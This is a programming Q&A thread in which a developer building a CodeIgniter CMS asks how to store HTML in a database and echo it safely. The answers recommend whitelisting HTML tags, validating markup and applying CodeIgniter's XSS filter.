Storing HTML in database codeigniter

Question

I am creating a CMS with codeigniter and need to store some text that is wrapped in html. I will then get the data from the database and echo it onto my page. What is the best way to do this being security conscious?

Example of data:

<h2>A fresh approach</h2>
    <p>Whether you have queries regarding your</p>
<a href="#">cgoto page</a>

Answer 1

Sanitization is always necessary.

I'm a particular fan of using white lists for HTML tags so you analyze the data you're about to store and simply wipe out the HTML tags that are not in that white list. This way, if you desire, you can prevent users from inserting certain tags like <script> or <object> with unpredictable or obscure behavior.

Suppose one of your CMS users uses a very dumb password and someone else gains access over the application. Filtering HTML content would prevent the impostor from inserting malicious cross domain javascript to collect keyboard events (that might reveal possible passwords in login forms) and etc.

Also it's always good to validate the HTML you're going to store since any invalid HTML would end up hurting your website markup and even breaking your rendering in some browsers.

Doing that checks before storing things in database might not be enough since data can be corrupted by direct database access, so before echoing the content do what @RodrigoFerreira said.

Answer 2

Apply a XSS filter before saving (better, because you'll save once and echo several times) or on output and assign the content to a variable passed to the view. You may use $this->security->xss_clean($data_retrieved).